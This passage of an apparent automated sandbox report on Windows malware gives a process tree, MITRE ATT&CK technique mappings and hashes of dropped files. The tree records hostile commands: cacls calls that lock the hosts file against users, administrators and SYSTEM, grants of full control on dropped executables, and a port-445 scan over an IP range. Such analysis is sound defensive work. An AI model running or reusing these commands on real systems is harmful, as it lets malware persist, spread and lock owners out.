C:\Windows\umubtmbps\bbrcgicuu\fuinnkdmr.exefuinnkdmr.exe TCP 191.101.0.1 191.101.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:5024
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:6020
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1616
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:5980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3808
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:3384
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4068
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:700
-
-
-
C:\Windows\SysWOW64\wokakm.exeC:\Windows\SysWOW64\wokakm.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1452
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F1⤵PID:3140
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5060
-
-
C:\Windows\system32\cacls.execacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F2⤵PID:2988
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\vkdejee.exe1⤵PID:1836
-
C:\Windows\ime\vkdejee.exeC:\Windows\ime\vkdejee.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5000
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F1⤵PID:4068
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4296
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F2⤵PID:2340
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F1⤵PID:4356
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3304
-
-
C:\Windows\system32\cacls.execacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F2⤵PID:4228
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\vkdejee.exe1⤵PID:2856
-
C:\Windows\ime\vkdejee.exeC:\Windows\ime\vkdejee.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3876
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F1⤵PID:3772
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4772
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F2⤵PID:4360
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F1⤵PID:4788
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5492
-
-
C:\Windows\system32\cacls.execacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F2⤵PID:4344
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\vkdejee.exe1⤵PID:4288
-
C:\Windows\ime\vkdejee.exeC:\Windows\ime\vkdejee.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4736
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F1⤵PID:1832
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:376
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F2⤵PID:4376
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
8.5MB
MD50d4ea75dffe38cd90f990ca3fed49dac
SHA167467e0a919ae8ecc54d32d10b638ead574e2698
SHA25631b773a4473d045186f06fb18dc8bbf326e6efa2333a0a8f29aa20400f3b0cf6
SHA512ad0ecce995d9131a65c1621f203ac7ed86c7df7ed87d8e1e3ae829ec2ccde078dd9611610f1486acf9562ca2851b777941db649a901609c69ef71538853bc90e
-
Filesize
4.2MB
MD5f66e2cdd691789277a080fc44a2c7c91
SHA12d7f79b8e00cad0a21475ee6c26d242f15fb9ce4
SHA256b77e8ca034f0b6d98a44aa88978e73e4839321ac66f3e540a954bb4d635b07fd
SHA512f999ae4f0ade6afd3f8e5e5e67fa39bc557cfe25f34bac824f7f0fcf1cf226745ff6f37a5c72688c2cb39b0e0532864f4052dd807dcdcce7b5fcdff7cc1de627
-
Filesize
26.3MB
MD52de62112bda22981d5b3122500e10147
SHA11ebeddc04605bdf81200aaf7beb8880a9d624724
SHA256bae83ec0c6fd07ae5b25667aaf89d77f0c829d689e806d6eb8e988808703b85e
SHA512df088ccc4822a174540f14ae21238822666c04334c27e29131c5566789b886992401321d189848d5c3febfcc707c0ac081a3194d02c60b69059f86ef422b8f57
-
Filesize
3.8MB
MD537f505aee373ba3dd67ec0f13aeaa0e0
SHA12dc4535116e2d072266eb7c572af780e35f93ef2
SHA256c7bd964d12fcbf9ce5a8ca783a1a60bebcaa3c1fdb6547a7e25a755a129d0600
SHA5124e29677b9f9d06d31d6643c49a20f14b739b29e6e062522d4bbddaa1d630c72b4f2852880c442c05ce1578d763c7a4e6830c136427796f6ea4e4fa4d694c30c7
-
Filesize
2.9MB
MD532e98e874040c2a7b5eae3f3baf21dfa
SHA11cd02dd0a89bdb40d236f26a04449abf8f73d8b1
SHA25676200d6eaeb070995b643cd4aabf596482eb2821e001ea9a71b52b2bc24a3e77
SHA5126e9df5c18ad4b9dde39f451212c0388b4168dcba02a277af2fbb499ac4787f246bf43dd2ddb5e06267b651f43417f49edac2a6269e58231011e6164c9a17bc34
-
Filesize
7.7MB
MD53a3a3786bd6ebfbcec0b563e90dfa6a3
SHA1254d2d36bc5ac4bb12736222a05fbb41edb5cc0e
SHA2561fb4d5ba6a83354fb6ab1c9c8cf48eeb0de16d57f1266f3b465610e7fadaed63
SHA512be7932fdd740667308dba668c5493d7e98e65e2c970a39f64c739309309ab735824878bc58ce5d0f346c1a4fcb610a15573350233bea5df9483486cc1abcb091
-
Filesize
810KB
MD5c2459bb0a26407db098e5d4985c852ba
SHA1c1c2a9300a76625898727adaa33ba1375dbc8e4a
SHA25637f4eb5c8208c6f4830fd211af18aa16b8607fe7e0854bc5d81fb9b9154cca99
SHA5126a7ff21862e2f9401c18299034b5da12dc00981604f752e5e031a3cb619e1ab27ab2d1e634878ed6e2452279d86375ee8e5583ab333737d1953c1a7679703a21
-
Filesize
2.3MB
MD5354d26fa7b7fcf15b549e880c600f874
SHA14d46f94b5a2717db31ccb0ee7f654bf90857ed99
SHA2563fe38b07624ea5ffae4b67ac2c5d0d0dd936270881541892a99cb8bcb285609c
SHA512e2227af30280b3a9c883aff2aa41eb1702cc53aacf781a457c8c1b0153dd1ac0dd1a22d043c5e7673945c2e35ba2258fd4982566a19fa03a14468e293ce9c419
-
Filesize
33.6MB
MD57dacdbba1b420f8388e509f435eaccf2
SHA1682fdfa5858bdfbf0c15dad5bf6a43822de0128f
SHA2562dbdc7848b6622bb338db121f131f48b6246a6f60dd6cab2dbcb63e9a4c47d74
SHA512d2e37fba31d3ee512657ee712b072c88ce10fe063327aad085535842e686feddc94edc50f195e38a8c2715c4e23aaf53757aa85bea8630a2032441079a2dd614
-
Filesize
20.7MB
MD58503b1df376e6f440cb5262212541c13
SHA1416f76b8f537b3fc834a2e835a427ec5c60dfb5b
SHA2567e1942aa401a58f56f1eaaf0eb7dbffd823d89dc9664daf1b9e67eb635145503
SHA512d80a8076429d90904e07ce007e28740fe35cc181f0f1e8c2f78196410f5dd1ba37d245fa39f4906c7ab31f5078a28a8a1bd28764c21c837c1c7121f18ee33b6e
-
Filesize
4.3MB
MD59a7fb80621918dee95caf6bb3dbeb74b
SHA1bfd11631722d70a58adf81041d790774de476ea5
SHA25628b06ad0d8ceb00eb12861ccc38643ee1f032788e8724f19d15badddda4fcbc1
SHA5128c49e459425060cd02d611371603fd29175bab6b4a2531303883b275665598d0b79055a8c0617848e7b6a4c9651de36b970e4cc2bcb16cc629f9a3f2188b5df3
-
Filesize
1.2MB
MD55903fbf974897dcec0f6b825b21d8e2b
SHA16500fdd73c65662ffacfe3d75ef0e8e9381435a3
SHA2563d326426a235d16a4d72e0a6ede146b11fff8792874e9e56f7ffdd6b84833563
SHA512b7edb20bd1fae900a2ba02e42df1d3ff8ed1148f929b28764f84086db1caf8ea50c2bbfe8bac67f1f6c785bf702c623aa9ab4fd66185488e7d1471f7123d3113
-
Filesize
1.9MB
MD5038605377affee64b07f1599d548b256
SHA1ca8f1dc16b19169f7db0fe3d99afdc107dea29cc
SHA256460a91eed63f4f7cd784dc140795eaa97adb5e85b2230839f5009666a01c720e
SHA51243aa2667a2a8b2a4ef697b20e4d47baaabe016e50564060e79265961cc4631aebd1a796c18134d5686a7120873571cc9cab9f5214d96765def9cba291e77b716
-
Filesize
44.1MB
MD57af93ac1a64fb8c609e2c78fc26b0285
SHA1c2c15b6581472a2dcbbce163212aaf6e8cdf2a6e
SHA256b3565d6fd657df7b9446eef6af8e8bd987acab0516180aebe4383c1b5b123782
SHA51253393d7420fefbf3dcc37e1bb635dc6544a123f677b802fba7b34f480c45def81def80e81af0414fd3cd92c2d59f30b43117fd1fd4bbf24e5f4a70cb76ba63ad
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
8.0MB
MD5d607b750001ae1b0ffe35411e7836769
SHA1bbb30c1491d636a3ccaccc731a3d3d56b164e932
SHA2560cc5cd8f04bcac7f81bceb06f4da41fd7f16d1a234cbc5840f60e6e136042774
SHA512b4c2aa0b8be93f9bfef675b491abbef19847f15d05c1bec54e84eb02e3378acebc16a6749c25c9ad6f912372ea0f545e3a2eb8b5e1fd6d72cf23f904413e8479
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe